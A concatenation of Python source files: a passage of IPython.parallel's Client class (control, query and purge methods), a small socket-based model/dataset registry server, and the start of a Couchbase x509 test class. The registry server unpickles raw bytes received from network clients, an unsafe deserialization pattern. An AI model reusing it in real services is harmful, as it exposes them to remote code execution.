"""Always up-to-date ids property."""
self._flush_notifications()
# always copy:
return list(self._ids)
def activate(self, targets='all', suffix=''):
"""Create a DirectView and register it with IPython magics
Defines the magics `%px, %autopx, %pxresult, %%px`
Parameters
----------
targets: int, list of ints, or 'all'
The engines on which the view's magics will run
suffix: str [default: '']
The suffix, if any, for the magics. This allows you to have
multiple views associated with parallel magics at the same time.
e.g. ``rc.activate(targets=0, suffix='0')`` will give you
the magics ``%px0``, ``%pxresult0``, etc. for running magics just
on engine 0.
"""
view = self.direct_view(targets)
view.block = True
view.activate(suffix)
return view
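# Illustrative usage sketch, not part of the original source. Assuming an
# IPython session connected to a running cluster:
#
#     rc = Client()
#     rc.activate()                        # registers %px, %%px, %autopx, %pxresult
#     rc.activate(targets=0, suffix='0')   # %px0 etc. target only engine 0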
def close(self, linger=None):
"""Close my zmq Sockets
If `linger`, set the zmq LINGER socket option,
which allows discarding of messages.
"""
if self._closed:
return
self.stop_spin_thread()
snames = [ trait for trait in self.trait_names() if trait.endswith("socket") ]
for name in snames:
socket = getattr(self, name)
if socket is not None and not socket.closed:
if linger is not None:
socket.close(linger=linger)
else:
socket.close()
self._closed = True
def _spin_every(self, interval=1):
"""target func for use in spin_thread"""
while True:
if self._stop_spinning.is_set():
return
time.sleep(interval)
self.spin()
def spin_thread(self, interval=1):
"""call Client.spin() in a background thread on some regular interval
This helps ensure that messages don't pile up too much in the zmq queue
while you are working on other things, or just leaving an idle terminal.
It also helps limit potential padding of the `received` timestamp
on AsyncResult objects, used for timings.
Parameters
----------
interval : float, optional
The interval on which to spin the client in the background thread
(simply passed to time.sleep).
Notes
-----
For precision timing, you may want to use this method to put a bound
on the jitter (in seconds) in `received` timestamps used
in AsyncResult.wall_time.
"""
if self._spin_thread is not None:
self.stop_spin_thread()
self._stop_spinning.clear()
self._spin_thread = Thread(target=self._spin_every, args=(interval,))
self._spin_thread.daemon = True
self._spin_thread.start()
def stop_spin_thread(self):
"""stop background spin_thread, if any"""
if self._spin_thread is not None:
self._stop_spinning.set()
self._spin_thread.join()
self._spin_thread = None
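# Illustrative usage sketch, not part of the original source: keep results
# flushing in the background while doing other work, then stop the thread.
#
#     rc.spin_thread(interval=0.5)
#     ...                       # submit work, interact, etc.
#     rc.stop_spin_thread()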
def spin(self):
"""Flush any registration notifications and execution results
waiting in the ZMQ queue.
"""
if self._notification_socket:
self._flush_notifications()
if self._iopub_socket:
self._flush_iopub(self._iopub_socket)
if self._mux_socket:
self._flush_results(self._mux_socket)
if self._task_socket:
self._flush_results(self._task_socket)
if self._control_socket:
self._flush_control(self._control_socket)
if self._query_socket:
self._flush_ignored_hub_replies()
def wait(self, jobs=None, timeout=-1):
"""waits on one or more `jobs`, for up to `timeout` seconds.
Parameters
----------
jobs : int, str, or list of ints and/or strs, or one or more AsyncResult objects
ints are indices to self.history
strs are msg_ids
default: wait on all outstanding messages
timeout : float
a time in seconds, after which to give up.
default is -1, which means no timeout
Returns
-------
True : when all msg_ids are done
False : timeout reached, some msg_ids still outstanding
"""
tic = time.time()
if jobs is None:
theids = self.outstanding
else:
if isinstance(jobs, (int, str, AsyncResult)):
jobs = [jobs]
theids = set()
for job in jobs:
if isinstance(job, int):
# index access
job = self.history[job]
elif isinstance(job, AsyncResult):
list(map(theids.add, job.msg_ids))
continue
theids.add(job)
if not theids.intersection(self.outstanding):
return True
self.spin()
while theids.intersection(self.outstanding):
if timeout >= 0 and ( time.time()-tic ) > timeout:
break
time.sleep(1e-3)
self.spin()
return len(theids.intersection(self.outstanding)) == 0
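# Illustrative usage sketch, not part of the original source. Assuming `rc`
# is a connected Client and `dview` is a view created from it:
#
#     ar = dview.apply_async(sum, [1, 2, 3])
#     if rc.wait([ar], timeout=5):          # True when the job finished in time
#         print(ar.get())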
#--------------------------------------------------------------------------
# Control methods
#--------------------------------------------------------------------------
@spin_first
def clear(self, targets=None, block=None):
"""Clear the namespace in target(s)."""
block = self.block if block is None else block
targets = self._build_targets(targets)[0]
for t in targets:
self.session.send(self._control_socket, 'clear_request', content={}, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def abort(self, jobs=None, targets=None, block=None):
"""Abort specific jobs from the execution queues of target(s).
This is a mechanism to prevent jobs that have already been submitted
from executing.
Parameters
----------
jobs : msg_id, list of msg_ids, or AsyncResult
The jobs to be aborted
If unspecified/None: abort all outstanding jobs.
"""
block = self.block if block is None else block
jobs = jobs if jobs is not None else list(self.outstanding)
targets = self._build_targets(targets)[0]
msg_ids = []
if isinstance(jobs, (str,AsyncResult)):
jobs = [jobs]
bad_ids = [obj for obj in jobs if not isinstance(obj, (str, AsyncResult))]
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
content = dict(msg_ids=msg_ids)
for t in targets:
self.session.send(self._control_socket, 'abort_request',
content=content, ident=t)
error = False
if block:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket,0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if error:
raise error
@spin_first
def shutdown(self, targets='all', restart=False, hub=False, block=None):
"""Terminates one or more engine processes, optionally including the hub.
Parameters
----------
targets: list of ints or 'all' [default: all]
Which engines to shutdown.
hub: bool [default: False]
Whether to include the Hub. hub=True implies targets='all'.
block: bool [default: self.block]
Whether to wait for clean shutdown replies or not.
restart: bool [default: False]
NOT IMPLEMENTED
whether to restart engines after shutting them down.
"""
from IPython.parallel.error import NoEnginesRegistered
if restart:
raise NotImplementedError("Engine restart is not yet implemented")
block = self.block if block is None else block
if hub:
targets = 'all'
try:
targets = self._build_targets(targets)[0]
except NoEnginesRegistered:
targets = []
for t in targets:
self.session.send(self._control_socket, 'shutdown_request',
content={'restart':restart},ident=t)
error = False
if block or hub:
self._flush_ignored_control()
for i in range(len(targets)):
idents,msg = self.session.recv(self._control_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
else:
self._ignored_control_replies += len(targets)
if hub:
time.sleep(0.25)
self.session.send(self._query_socket, 'shutdown_request')
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
if msg['content']['status'] != 'ok':
error = self._unwrap_exception(msg['content'])
if error:
raise error
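# Illustrative usage sketch, not part of the original source:
#
#     rc.shutdown(targets=[2], block=True)  # stop engine 2 and wait for its reply
#     rc.shutdown(hub=True)                 # stop all engines and the Hub itself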
#--------------------------------------------------------------------------
# Execution related methods
#--------------------------------------------------------------------------
def _maybe_raise(self, result):
"""wrapper for maybe raising an exception if apply failed."""
if isinstance(result, error.RemoteError):
raise result
return result
def send_apply_request(self, socket, f, args=None, kwargs=None, metadata=None, track=False,
ident=None):
"""construct and send an apply message via a socket.
This is the principal method with which all engine execution is performed by views.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
args = args if args is not None else []
kwargs = kwargs if kwargs is not None else {}
metadata = metadata if metadata is not None else {}
# validate arguments
if not isinstance(f, collections.Callable) and not isinstance(f, Reference):
raise TypeError("f must be callable, not %s"%type(f))
if not isinstance(args, (tuple, list)):
raise TypeError("args must be tuple or list, not %s"%type(args))
if not isinstance(kwargs, dict):
raise TypeError("kwargs must be dict, not %s"%type(kwargs))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s"%type(metadata))
bufs = serialize.pack_apply_message(f, args, kwargs,
buffer_threshold=self.session.buffer_threshold,
item_threshold=self.session.item_threshold,
)
msg = self.session.send(socket, "apply_request", buffers=bufs, ident=ident,
metadata=metadata, track=track)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in list(self._engines.values()):
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
def send_execute_request(self, socket, code, silent=True, metadata=None, ident=None):
"""construct and send an execute request via a socket.
"""
if self._closed:
raise RuntimeError("Client cannot be used after its sockets have been closed")
# defaults:
metadata = metadata if metadata is not None else {}
# validate arguments
if not isinstance(code, str):
raise TypeError("code must be text, not %s" % type(code))
if not isinstance(metadata, dict):
raise TypeError("metadata must be dict, not %s" % type(metadata))
content = dict(code=code, silent=bool(silent), user_variables=[], user_expressions={})
msg = self.session.send(socket, "execute_request", content=content, ident=ident,
metadata=metadata)
msg_id = msg['header']['msg_id']
self.outstanding.add(msg_id)
if ident:
# possibly routed to a specific engine
if isinstance(ident, list):
ident = ident[-1]
if ident in list(self._engines.values()):
# save for later, in case of engine death
self._outstanding_dict[ident].add(msg_id)
self.history.append(msg_id)
self.metadata[msg_id]['submitted'] = datetime.now()
return msg
#--------------------------------------------------------------------------
# construct a View object
#--------------------------------------------------------------------------
def load_balanced_view(self, targets=None):
"""construct a DirectView object.
If no arguments are specified, create a LoadBalancedView
using all engines.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The subset of engines across which to load-balance
"""
if targets == 'all':
targets = None
if targets is not None:
targets = self._build_targets(targets)[1]
return LoadBalancedView(client=self, socket=self._task_socket, targets=targets)
def direct_view(self, targets='all'):
"""construct a DirectView object.
If no targets are specified, create a DirectView using all engines.
rc.direct_view('all') is distinguished from rc[:] in that 'all' will
evaluate the target engines at each execution, whereas rc[:] will connect to
all *current* engines, and that list will not change.
That is, 'all' will always use all engines, whereas rc[:] will not use
engines added after the DirectView is constructed.
Parameters
----------
targets: list,slice,int,etc. [default: use all engines]
The engines to use for the View
"""
single = isinstance(targets, int)
# allow 'all' to be lazily evaluated at each execution
if targets != 'all':
targets = self._build_targets(targets)[1]
if single:
targets = targets[0]
return DirectView(client=self, socket=self._mux_socket, targets=targets)
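# Illustrative usage sketch, not part of the original source: the lazy 'all'
# view keeps tracking newly registered engines, while rc[:] is fixed to the
# engines present when it was built.
#
#     all_view = rc.direct_view('all')
#     fixed    = rc[:]
#     single   = rc[0]          # DirectView on engine 0 only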
#--------------------------------------------------------------------------
# Query methods
#--------------------------------------------------------------------------
@spin_first
def get_result(self, indices_or_msg_ids=None, block=None):
"""Retrieve a result by msg_id or history index, wrapped in an AsyncResult object.
If the client already has the results, no request to the Hub will be made.
This is a convenient way to construct AsyncResult objects, which are wrappers
that include metadata about execution, and allow for awaiting results that
were not submitted by this Client.
It can also be a convenient way to retrieve the metadata associated with
blocking execution, since it always returns an AsyncResult carrying that metadata.
Examples
--------
::
In [10]: r = client.apply()
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of indices to be retrieved
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncResult
A single AsyncResult object will always be returned.
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
single_result = False
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
single_result = True
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, str):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
local_ids = [msg_id for msg_id in theids if msg_id in self.outstanding or msg_id in self.results]
remote_ids = [msg_id for msg_id in theids if msg_id not in local_ids]
# given single msg_id initially, get_result should return the result itself,
# not a length-one list
if single_result:
theids = theids[0]
if remote_ids:
ar = AsyncHubResult(self, msg_ids=theids)
else:
ar = AsyncResult(self, msg_ids=theids)
if block:
ar.wait()
return ar
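# Illustrative usage sketch, not part of the original source (msg_id below is
# some previously recorded id from rc.history):
#
#     ar = rc.get_result(-1)        # AsyncResult for the most recent submission
#     ar = rc.get_result(msg_id)    # or by msg_id, fetched from the Hub if needed
#     ar.wait()
#     print(ar.metadata)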
@spin_first
def resubmit(self, indices_or_msg_ids=None, metadata=None, block=None):
"""Resubmit one or more tasks.
in-flight tasks may not be resubmitted.
Parameters
----------
indices_or_msg_ids : integer history index, str msg_id, or list of either
The indices or msg_ids of indices to be retrieved
block : bool
Whether to wait for the result to be done
Returns
-------
AsyncHubResult
A subclass of AsyncResult that retrieves results from the Hub
"""
block = self.block if block is None else block
if indices_or_msg_ids is None:
indices_or_msg_ids = -1
if not isinstance(indices_or_msg_ids, (list,tuple)):
indices_or_msg_ids = [indices_or_msg_ids]
theids = []
for id in indices_or_msg_ids:
if isinstance(id, int):
id = self.history[id]
if not isinstance(id, str):
raise TypeError("indices must be str or int, not %r"%id)
theids.append(id)
content = dict(msg_ids = theids)
self.session.send(self._query_socket, 'resubmit_request', content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
mapping = content['resubmitted']
new_ids = [ mapping[msg_id] for msg_id in theids ]
ar = AsyncHubResult(self, msg_ids=new_ids)
if block:
ar.wait()
return ar
@spin_first
def result_status(self, msg_ids, status_only=True):
"""Check on the status of the result(s) of the apply request with `msg_ids`.
If status_only is False, then the actual results will be retrieved, else
only the status of the results will be checked.
Parameters
----------
msg_ids : list of msg_ids
if int:
Passed as index to self.history for convenience.
status_only : bool (default: True)
if False:
Retrieve the actual results of completed tasks.
Returns
-------
results : dict
There will always be the keys 'pending' and 'completed', which will
be lists of msg_ids that are incomplete or complete. If `status_only`
is False, then completed results will be keyed by their `msg_id`.
"""
if not isinstance(msg_ids, (list,tuple)):
msg_ids = [msg_ids]
theids = []
for msg_id in msg_ids:
if isinstance(msg_id, int):
msg_id = self.history[msg_id]
if not isinstance(msg_id, str):
raise TypeError("msg_ids must be str, not %r"%msg_id)
theids.append(msg_id)
completed = []
local_results = {}
# comment this block out to temporarily disable local shortcut:
for msg_id in theids:
if msg_id in self.results:
completed.append(msg_id)
local_results[msg_id] = self.results[msg_id]
theids.remove(msg_id)
if theids: # some not locally cached
content = dict(msg_ids=theids, status_only=status_only)
msg = self.session.send(self._query_socket, "result_request", content=content)
zmq.select([self._query_socket], [], [])
idents,msg = self.session.recv(self._query_socket, zmq.NOBLOCK)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
buffers = msg['buffers']
else:
content = dict(completed=[],pending=[])
content['completed'].extend(completed)
if status_only:
return content
failures = []
# load cached results into result:
content.update(local_results)
# update cache with results:
for msg_id in sorted(theids):
if msg_id in content['completed']:
rec = content[msg_id]
parent = rec['header']
header = rec['result_header']
rcontent = rec['result_content']
iodict = rec['io']
if isinstance(rcontent, str):
rcontent = self.session.unpack(rcontent)
md = self.metadata[msg_id]
md_msg = dict(
content=rcontent,
parent_header=parent,
header=header,
metadata=rec['result_metadata'],
)
md.update(self._extract_metadata(md_msg))
if rec.get('received'):
md['received'] = rec['received']
md.update(iodict)
if rcontent['status'] == 'ok':
if header['msg_type'] == 'apply_reply':
res,buffers = serialize.unserialize_object(buffers)
elif header['msg_type'] == 'execute_reply':
res = ExecuteReply(msg_id, rcontent, md)
else:
raise KeyError("unhandled msg type: %r" % header['msg_type'])
else:
res = self._unwrap_exception(rcontent)
failures.append(res)
self.results[msg_id] = res
content[msg_id] = res
if len(theids) == 1 and failures:
raise failures[0]
error.collect_exceptions(failures, "result_status")
return content
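# Illustrative usage sketch, not part of the original source:
#
#     status = rc.result_status(rc.history[-5:], status_only=True)
#     print(status['pending'], status['completed'])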
@spin_first
def queue_status(self, targets='all', verbose=False):
"""Fetch the status of engine queues.
Parameters
----------
targets : int/str/list of ints/strs
the engines whose states are to be queried.
default : all
verbose : bool
Whether to return lengths only, or lists of ids for each element
"""
if targets == 'all':
# allow 'all' to be evaluated on the engine
engine_ids = None
else:
engine_ids = self._build_targets(targets)[1]
content = dict(targets=engine_ids, verbose=verbose)
self.session.send(self._query_socket, "queue_request", content=content)
idents,msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
status = content.pop('status')
if status != 'ok':
raise self._unwrap_exception(content)
content = rekey(content)
if isinstance(targets, int):
return content[targets]
else:
return content
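# Illustrative usage sketch, not part of the original source:
#
#     all_queues = rc.queue_status()            # per-engine queue info, keyed by id
#     engine0    = rc.queue_status(targets=0)   # just engine 0's entry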
def _build_msgids_from_target(self, targets=None):
"""Build a list of msg_ids from the list of engine targets"""
if not targets: # needed as _build_targets otherwise uses all engines
return []
target_ids = self._build_targets(targets)[0]
return [md_id for md_id in self.metadata if self.metadata[md_id]["engine_uuid"] in target_ids]
def _build_msgids_from_jobs(self, jobs=None):
"""Build a list of msg_ids from "jobs" """
if not jobs:
return []
msg_ids = []
if isinstance(jobs, (str,AsyncResult)):
jobs = [jobs]
bad_ids = [obj for obj in jobs if not isinstance(obj, (str, AsyncResult))]
if bad_ids:
raise TypeError("Invalid msg_id type %r, expected str or AsyncResult"%bad_ids[0])
for j in jobs:
if isinstance(j, AsyncResult):
msg_ids.extend(j.msg_ids)
else:
msg_ids.append(j)
return msg_ids
def purge_local_results(self, jobs=[], targets=[]):
"""Clears the client caches of results and frees such memory.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_local_results('all')` to scrub everything from the Clients's db.
The client must have no outstanding tasks before purging the caches.
Raises `AssertionError` if there are still outstanding tasks.
After this call all `AsyncResults` are invalid and should be discarded.
If you must "reget" the results, you can still do so by using
`client.get_result(msg_id)` or `client.get_result(asyncresult)`. This will
redownload the results from the hub if they are still available
(i.e. `client.purge_hub_results(...)` has not been called).
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be purged.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire results are to be purged.
default : None
"""
assert not self.outstanding, "Can't purge a client with outstanding tasks!"
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if jobs == 'all':
self.results.clear()
self.metadata.clear()
return
else:
msg_ids = []
msg_ids.extend(self._build_msgids_from_target(targets))
msg_ids.extend(self._build_msgids_from_jobs(jobs))
list(map(self.results.pop, msg_ids))
list(map(self.metadata.pop, msg_ids))
@spin_first
def purge_hub_results(self, jobs=[], targets=[]):
"""Tell the Hub to forget results.
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub everything from the Hub's db.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
if not targets and not jobs:
raise ValueError("Must specify at least one of `targets` and `jobs`")
if targets:
targets = self._build_targets(targets)[1]
# construct msg_ids from jobs
if jobs == 'all':
msg_ids = jobs
else:
msg_ids = self._build_msgids_from_jobs(jobs)
content = dict(engine_ids=targets, msg_ids=msg_ids)
self.session.send(self._query_socket, "purge_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
def purge_results(self, jobs=[], targets=[]):
"""Clears the cached results from both the hub and the local client
Individual results can be purged by msg_id, or the entire
history of specific targets can be purged.
Use `purge_results('all')` to scrub every cached result from both the Hub's and
the Client's db.
Equivalent to calling both `purge_hub_results()` and `purge_local_results()` with
the same arguments.
Parameters
----------
jobs : str or list of str or AsyncResult objects
the msg_ids whose results should be forgotten.
targets : int/str/list of ints/strs
The targets, by int_id, whose entire history is to be purged.
default : None
"""
self.purge_local_results(jobs=jobs, targets=targets)
self.purge_hub_results(jobs=jobs, targets=targets)
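# Illustrative usage sketch, not part of the original source: the caches can
# only be purged once nothing is outstanding.
#
#     rc.wait()                   # ensure no outstanding tasks remain
#     rc.purge_results(jobs=ar)   # forget the records of one AsyncResult
#     rc.purge_results('all')     # scrub both the local and the Hub caches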
def purge_everything(self):
"""Clears all content from previous Tasks from both the hub and the local client
In addition to calling `purge_results("all")` it also deletes the history and
other bookkeeping lists.
"""
self.purge_results("all")
self.history = []
self.session.digest_history.clear()
@spin_first
def hub_history(self):
"""Get the Hub's history
Just like the Client, the Hub has a history, which is a list of msg_ids.
This will contain the history of all clients, and, depending on configuration,
may contain history across multiple cluster sessions.
Any msg_id returned here is a valid argument to `get_result`.
Returns
-------
msg_ids : list of strs
list of all msg_ids, ordered by task submission time.
"""
self.session.send(self._query_socket, "history_request", content={})
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
else:
return content['history']
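# Illustrative usage sketch, not part of the original source:
#
#     msg_ids = rc.hub_history()
#     ar = rc.get_result(msg_ids[-1])   # any returned msg_id works with get_result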
@spin_first
def db_query(self, query, keys=None):
"""Query the Hub's TaskRecord database
This will return a list of task record dicts that match `query`
Parameters
----------
query : mongodb query dict
The search dict. See mongodb query docs for details.
keys : list of strs [optional]
The subset of keys to be returned. The default is to fetch everything but buffers.
'msg_id' will *always* be included.
"""
if isinstance(keys, str):
keys = [keys]
content = dict(query=query, keys=keys)
self.session.send(self._query_socket, "db_request", content=content)
idents, msg = self.session.recv(self._query_socket, 0)
if self.debug:
pprint(msg)
content = msg['content']
if content['status'] != 'ok':
raise self._unwrap_exception(content)
records = content['records']
buffer_lens = content['buffer_lens']
result_buffer_lens = content['result_buffer_lens']
buffers = msg['buffers']
has_bufs = buffer_lens is not None
has_rbufs = result_buffer_lens is not None
for i,rec in enumerate(records):
# relink buffers
if has_bufs:
blen = buffer_lens[i]
rec['buffers'], buffers = buffers[:blen],buffers[blen:]
if has_rbufs:
blen = result_buffer_lens[i]
rec['result_buffers'], buffers = buffers[:blen],buffers[blen:]
return records
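# Illustrative usage sketch, not part of the original source, assuming the Hub
# is backed by a TaskRecord database that accepts MongoDB-style queries (the
# query values below are made up for illustration):
#
#     recs = rc.db_query({'completed': {'$ne': None}}, keys=['msg_id', 'completed'])
#     recs = rc.db_query({'engine_uuid': some_engine_uuid})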
__all__ = [ 'Client' ]
|
CenterServer.py
|
import socket
from threading import Thread
import time
import pickle
address = ('127.0.0.1', 11451)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
models: dict[str, list] = {} # registry of model servers, keyed by model name
dataGroups: dict[str, tuple] = {} # registry of dataset servers, keyed by dataset name
def registerModelServer(address, modelName):
"""
Register a model server.
"""
if models.get(modelName) is None:
models[modelName] = []
models[modelName].append(address)
def registerDataServer(address, dataGroupName, count) -> bool:
"""
Register a dataset server, providing its name and the size of the dataset.
"""
if dataGroups.get(dataGroupName) is None:
dataGroups[dataGroupName] = (address, count)
return True
else:
return False
def getInfos():
s1 = list(models.keys())
s2 = [len(it) for it in models.values()]
s3 = list(dataGroups.keys())
s4 = [it[1] for it in dataGroups.values()]
return pickle.dumps((s1, s2, s3, s4))
def requestProcess():
while True:
client, addr = server.accept()
data = client.recv(8)
try:
if b'000' == data:
# model server registration
client.sendall(b'ok')
data = client.recv(1024)
addr, modelName = pickle.loads(data)
registerModelServer(addr, modelName)
client.sendall(b'ok')
elif b'111' == data:
# model server deregistration
print('')
elif b'222' == data:
# dataset server registration
client.sendall(b'ok')
data = client.recv(1024)
addr, dataGroupName, count = pickle.loads(data)
if registerDataServer(addr, dataGroupName, count):
client.sendall(b'ok')
else:
client.sendall(b'fail')
elif b'333' == data:
# dataset server deregistration
print('')
elif b'444' == data:
# request model and dataset information
data = getInfos()
client.sendall(data)
elif b'555' == data:
# request the address of a model server
client.sendall(b'ok')
data = client.recv(1024)
key = pickle.loads(data)
if models.get(key) is None:
client.sendall(b'fail')
else:
ret = models[key][0]
data = pickle.dumps(ret)
client.sendall(data)
elif b'666' == data:
# request the address of a dataset server
client.sendall(b'ok')
data = client.recv(1024)
key = pickle.loads(data)
if dataGroups.get(key) is None:
client.sendall(b'fail')
else:
ret = dataGroups[key][0]
data = pickle.dumps(ret)
client.sendall(data)
else:
client.sendall(b'fail')
except BaseException:
print(data)
client.sendall(b'fail')
client.close()
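# Illustrative client-side sketch, not part of the original server code: a
# hypothetical helper showing how a client could use the request codes handled
# above (here b'444', which asks for the model/dataset overview).
def queryCenterInfos(centerAddress=address):
    """Return (model names, server counts, dataset names, dataset sizes)
    as pickled by getInfos() on the center server."""
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect(centerAddress)
        client.sendall(b'444')        # request model and dataset information
        data = client.recv(4096)      # pickled tuple produced by getInfos()
        return pickle.loads(data)
    finally:
        client.close()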
if '__main__' == __name__:
thd = Thread(target=requestProcess)
thd.daemon = True
server.bind(address)
server.listen(5)
thd.start()
while True:
s = input()
if 'stop' == s:
server.close()
break
elif 'test' == s:
print(models)
print(dataGroups)
print(getInfos())
else:
print('No such command')
print('stop - stop server')
print('test - output some test information')
|
x509tests.py
|
from basetestcase import BaseTestCase
from security.x509main import x509main
# from newupgradebasetest import NewUpgradeBaseTest
from membase.api.rest_client import RestConnection, RestHelper
import subprocess
import json
import socket
from couchbase.bucket import Bucket
from threading import Thread, Event
from remote.remote_util import RemoteMachineShellConnection
from security.auditmain import audit
from security.rbac_base import RbacBase
import os, subprocess
import copy
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
from ep_mc_bin_client import MemcachedClient
from security.ntonencryptionBase import ntonencryptionBase
from lib.Cb_constants.CBServer import CbServer
class x509tests(BaseTestCase):
def setUp(self):
super(x509tests, self).setUp()
self._reset_original()
self.ip_address = self.getLocalIPAddress()
self.ip_address = '172.16.1.174'
self.root_ca_path = x509main.CACERTFILEPATH + x509main.CACERTFILE
SSLtype = self.input.param("SSLtype", "go")
encryption_type = self.input.param('encryption_type', "")
key_length = self.input.param("key_length", 1024)
# Input parameters for state, paths, delimiters and prefixes
self.client_cert_state = self.input.param("client_cert_state", "disable")
self.paths = self.input.param('paths', "subject.cn:san.dnsname:san.uri").split(":")
self.prefixs = self.input.param('prefixs', 'www.cb-:us.:www.').split(":")
self.delimeters = self.input.param('delimeter', '.:.:.') .split(":")
self.setup_once = self.input.param("setup_once", False)
self.upload_json_mode = self.input.param("upload_json_mode", 'rest')
self.sdk_version = self.input.param('sdk_version', 'pre-vulcan')
self.dns = self.input.param('dns', None)
self.uri = self.input.param('uri', None)
self.enable_nton_local = self.input.param('enable_nton_local',False)
self.local_clusterEncryption = self.input.param('local_clusterEncryption','control')
self.wildcard_dns = self.input.param('wildcard_dns',None)
copy_servers = copy.deepcopy(self.servers)
# Generate cert and pass on the client ip for cert generation
if (self.dns is not None) or (self.uri is not None):
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address, alt_names='non_default', dns=self.dns, uri=self.uri,wildcard_dns=self.wildcard_dns)
else:
x509main(self.master)._generate_cert(copy_servers, type=SSLtype, encryption=encryption_type, key_length=key_length, client_ip=self.ip_address,wildcard_dns=self.wildcard_dns)
self.log.info(" Path is {0} - Prefixs - {1} -- Delimeters - {2}".format(self.paths, self.prefixs, self.delimeters))
if (self.setup_once):
x509main(self.master).setup_master(self.client_cert_state, self.paths, self.prefixs, self.delimeters, self.upload_json_mode)
x509main().setup_cluster_nodes_ssl(self.servers)
# reset the servers to ipv6 if there were ipv6
'''
for server in self.servers:
if server.ip.count(':') > 0:
# raw ipv6? enclose in square brackets
server.ip = '[' + server.ip + ']'
'''
self.log.info (" list of server {0}".format(self.servers))
self.log.info (" list of server {0}".format(copy_servers))
enable_audit = self.input.param('audit', None)
if enable_audit:
Audit = audit(host=self.master)
currentState = Audit.getAuditStatus()
self.log.info ("Current status of audit on ip - {0} is {1}".format(self.master.ip, currentState))
if not currentState:
self.log.info ("Enabling Audit ")
Audit.setAuditEnable('true')
self.sleep(30)
self.protocol = "http"
self.disable_ssl_certificate_validation = False
self.rest_port = CbServer.port
self.n1ql_port = CbServer.n1ql_port
self.cbas_port = CbServer.cbas_port
self.fts_port = CbServer.fts_port
if CbServer.use_https:
self.protocol = "https"
self.disable_ssl_certificate_validation = True
self.rest_port = CbServer.ssl_port
self.n1ql_port = CbServer.ssl_n1ql_port
self.cbas_port = CbServer.ssl_cbas_port
self.fts_port = CbServer.ssl_fts_port
def tearDown(self):
self.log.info ("Into Teardown")
self._reset_original()
shell = RemoteMachineShellConnection(x509main.SLAVE_HOST)
shell.execute_command("rm " + x509main.CACERTFILEPATH)
super(x509tests, self).tearDown()
def _reset_original(self):
self.log.info ("Reverting to original state - regenerating certificate and removing inbox folder")
tmp_path = "/tmp/abcd.pem"
for servers in self.servers:
cli_command = "ssl-manage"
remote_client = RemoteMachineShellConnection(servers)
options = "--regenerate-cert={0}".format(tmp_path)
output, error = remote_client.execute_couchbase_cli(cli_command=cli_command, options=options,
cluster_host=servers.cluster_ip, user="Administrator",
password="password")
x509main(servers)._delete_inbox_folder()
def checkConfig(self, eventID, host, expectedResults):
Audit = audit(eventID=eventID, host=host)
currentState = Audit.getAuditStatus()
self.log.info ("Current status of audit on ip - {0} is {1}".format(self.master.ip, currentState))
if not currentState:
self.log.info ("Enabling Audit ")
Audit.setAuditEnable('true')
self.sleep(30)
fieldVerification, valueVerification = Audit.validateEvents(expectedResults)
self.assertTrue(fieldVerification, "One of the fields is not matching")
self.assertTrue(valueVerification, "Values for one of the fields is not matching")
def getLocalIPAddress(self):
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('couchbase.com', 0))
return s.getsockname()[0]
'''
